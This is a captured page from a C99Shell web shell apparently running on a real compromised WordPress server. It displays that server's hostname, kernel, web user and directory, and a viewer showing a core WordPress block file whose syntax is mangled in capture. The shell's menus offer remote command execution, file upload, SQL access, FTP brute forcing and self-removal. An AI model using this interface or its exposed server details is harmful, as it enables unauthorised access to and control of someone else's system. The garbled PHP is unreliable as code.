!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.18.0. PHP/7.4.29 

uname -a: Linux ip-172-31-23-220 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/srishticampus.in/wp-includes/blocks/   drwxrwxr-x
Free 39.77 GB of 48.28 GB (82.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     comments-title.php (2.67 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Server-side rendering of the `core/comments-title` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments-title` block on the server.
 *
 * @param array $attributes Block attributes.
 *
 * @return string Return the post comments title.
 */
function render_block_core_comments_title$attributes ) {

    if ( 
post_password_required() ) {
        return;
    }

    
$align_class_name    = empty( $attributes['textAlign'] ) ? '' "has-text-align-{$attributes['textAlign']}";
    
$show_post_title     = ! empty( $attributes['showPostTitle'] ) && $attributes['showPostTitle'];
    
$show_comments_count = ! empty( $attributes['showCommentsCount'] ) && $attributes['showCommentsCount'];
    
$wrapper_attributes  get_block_wrapper_attributes( array( 'class' => $align_class_name ) );
    
$comments_count      get_comments_number();
    
/* translators: %s: Post title. */
    
$post_title sprintf__'&#8220;%s&#8221;' ), get_the_title() );
    
$tag_name   'h2';
    if ( isset( 
$attributes['level'] ) ) {
        
$tag_name 'h' $attributes['level'];
    }

    if ( 
'0' === $comments_count ) {
        return;
    }

    if ( 
$show_comments_count ) {
        if ( 
$show_post_title ) {
            if ( 
'1' === $comments_count ) {
                
/* translators: %s: Post title. */
                
$comments_title sprintf__'One response to %s' ), $post_title );
            } else {
                
$comments_title sprintf(
                    
/* translators: 1: Number of comments, 2: Post title. */
                    
_n(
                        
'%1$s response to %2$s',
                        
'%1$s responses to %2$s',
                        
$comments_count
                    
),
                    
number_format_i18n$comments_count ),
                    
$post_title
                
);
            }
        } elseif ( 
'1' === $comments_count ) {
            
$comments_title __'One response' );
        } else {
            
$comments_title sprintf(
                
/* translators: %s: Number of comments. */
                
_n'%s responses''%s responses'$comments_count ),
                
number_format_i18n$comments_count )
            );
        }
    } elseif ( 
$show_post_title ) {
        if ( 
'1' === $comments_count ) {
            
/* translators: %s: Post title. */
            
$comments_title sprintf__'Response to %s' ), $post_title );
        } else {
            
/* translators: %s: Post title. */
            
$comments_title sprintf__'Responses to %s' ), $post_title );
        }
    } elseif ( 
'1' === $comments_count ) {
        
$comments_title __'Response' );
    } else {
        
$comments_title __'Responses' );
    }

    return 
sprintf(
        
'<%1$s id="comments" %2$s>%3$s</%1$s>',
        
$tag_name,
        
$wrapper_attributes,
        
$comments_title
    
);
}

/**
 * Registers the `core/comments-title` block on the server.
 */
function register_block_core_comments_title() {
    
register_block_type_from_metadata(
        
__DIR__ '/comments-title',
        array(
            
'render_callback' => 'render_block_core_comments_title',
        )
    );
}

add_action'init''register_block_core_comments_title' );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0054 ]--